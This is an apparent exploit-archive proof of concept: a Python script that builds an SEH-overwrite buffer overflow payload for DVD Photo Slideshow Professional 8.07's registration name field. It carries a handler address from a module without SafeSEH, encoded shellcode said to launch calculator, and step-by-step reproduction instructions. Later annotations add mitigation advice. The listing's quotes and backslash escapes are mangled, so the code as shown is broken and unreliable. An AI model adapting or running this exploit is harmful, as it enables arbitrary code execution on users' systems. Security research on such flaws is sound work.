#Exploit Title: DVD Photo Slideshow Professional 8.07 – ‘Name’ Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the Python exploit script; it creates a new file named “name.txt”.
#2. Just copy the text inside “name.txt”.
#3. Start the program. In the new window click “Help” > “Register …
#4. Now paste the content of “name.txt” into the field: “Registration Name” > Click “Ok”
#5. The calculator runs successfully


#!/usr/bin/python

from struct import pack

# Proof-of-concept payload generator (Python 2 syntax: `print` statement).
# It only writes one string to name.txt; the header describes the manual
# steps that feed that string into the target's "Registration Name" field.
# NOTE(review): the listing is reproduced as archived, including its
# typographic quotes; it is kept byte-for-byte and not verified to run.

# Filler preceding the overwritten SEH record (per the author's naming).
buffer = “x41” * 256
# Next-SEH / SEH handler overwrite pair. The handler address below is taken
# from a module the author reports as lacking SafeSEH and ASLR (see the two
# annotation lines after it).
nseh = “xebx06xffxff”
seh = pack(“<I”,0x1004bb51)
#0x1004bb51 : pop edi # pop esi # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:Program FilesDVD Photo Slideshow ProfessionalDVDPhotoData.dll)
# Defensive note: the SEH-overwrite technique above depends on that module
# being built without SafeSEH/ASLR. Linking the DLL with /SAFESEH and
# /DYNAMICBASE, and enabling SEHOP and DEP on the host, invalidates this
# class of handler address; an overlong registration name reaching the
# vendor's input handler is the fix on the application side (bound the copy).
# Trailing padding appended after the shellcode.
long_buffer = “x44” * 600
# Opaque byte string as posted by the author; step 5 of the header states
# that it launches the calculator. Not analysed or modified here.
shellcode = “”
shellcode += “xdbxcexbfx90x28x2fx09xd9x74x24xf4x5dx29″
shellcode += “xc9xb1x31x31x7dx18x83xc5x04x03x7dx84xca”
shellcode += “xdaxf5x4cx88x25x06x8cxedxacxe3xbdx2dxca”
shellcode += “x60xedx9dx98x25x01x55xccxddx92x1bxd9xd2″
shellcode += “x13x91x3fxdcxa4x8ax7cx7fx26xd1x50x5fx17″
shellcode += “x1axa5x9ex50x47x44xf2x09x03xfbxe3x3ex59″
shellcode += “xc0x88x0cx4fx40x6cxc4x6ex61x23x5fx29xa1″
shellcode += “xc5x8cx41xe8xddxd1x6cxa2x56x21x1ax35xbf”
shellcode += “x78xe3x9axfexb5x16xe2xc7x71xc9x91x31x82″
shellcode += “x74xa2x85xf9xa2x27x1ex59x20x9fxfax58xe5″
shellcode += “x46x88x56x42x0cxd6x7ax55xc1x6cx86xdexe4″
shellcode += “xa2x0fxa4xc2x66x54x7ex6ax3ex30xd1x93x20″
shellcode += “x9bx8ex31x2ax31xdax4bx71x5fx1dxd9x0fx2d”
shellcode += “x1dxe1x0fx01x76xd0x84xcex01xedx4exabxee”
shellcode += “x0fx5bxc1x86x89x0ex68xcbx29xe5xaexf2xa9″
shellcode += “x0cx4ex01xb1x64x4bx4dx75x94x21xdex10x9a”
shellcode += “x96xdfx30xf9x79x4cxd8xd0x1cxf4x7bx2d”

# Final layout: filler, nSEH, SEH, shellcode, padding — concatenated in
# that order.
payload = buffer + nseh + seh + shellcode + long_buffer
try:
# The file is opened in text mode and never closed on error; a `with`
# block would release the handle on any exception.
f=open(“name.txt”,”w”)
print “[+] Creating %s bytes evil payload..” %len(payload)
f.write(payload)
f.close()
print “[+] File created!”
# Bare `except:` swallows every error (permission denied, disk full,
# KeyboardInterrupt) behind one generic message; catching IOError/OSError
# and printing the exception would make failures diagnosable.
except:
print “File cannot be created”




